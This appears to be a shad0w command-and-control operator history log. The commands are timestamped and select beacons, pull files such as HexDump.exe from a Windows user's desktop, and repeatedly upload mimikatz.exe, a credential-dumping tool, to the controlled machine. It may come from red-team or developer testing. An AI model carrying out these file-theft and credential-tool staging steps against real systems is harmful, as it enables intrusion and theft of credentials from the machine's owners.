
# 2020-05-07 11:10:45.024421
+ls

# 2020-05-07 11:20:05.962152
+cat C:\Users\thejoker\Desktop\HexDump.exe

# 2020-05-07 12:04:23.791404
+download C:\Users\thejoker\Desktop\HexDump.exe

# 2020-05-07 12:24:20.366956
+upload -f /root/shad0w/bin/mimikatz.exe

# 2020-05-07 12:27:41.794662
+beacons

# 2020-05-07 12:27:44.171054
+beacons -i 3

# 2020-05-07 12:27:45.941311
+download mimikatz.exe

# 2020-05-07 12:27:51.665045
+upload -f /root/shad0w/bin/mimikatz.exe

# 2020-05-07 13:11:22.678728
+upload -f /root/shad0w/bin/mimikatz.exe

# 2020-05-07 13:19:46.197158
+cat

# 2020-05-07 13:19:48.133275
+upload -f /root/shad0w/bin/mimikatz.exe

# 2020-05-07 13:21:33.132727
+upload -f /root/shad0w/bin/mimikatz.exe

# 2020-05-07 13:24:50.186787
+download HexDump.exe

# 2020-05-17 13:23:53.063008
+!pwd

# 2020-05-17 13:25:31.043572
+download ProcessHacker.exe
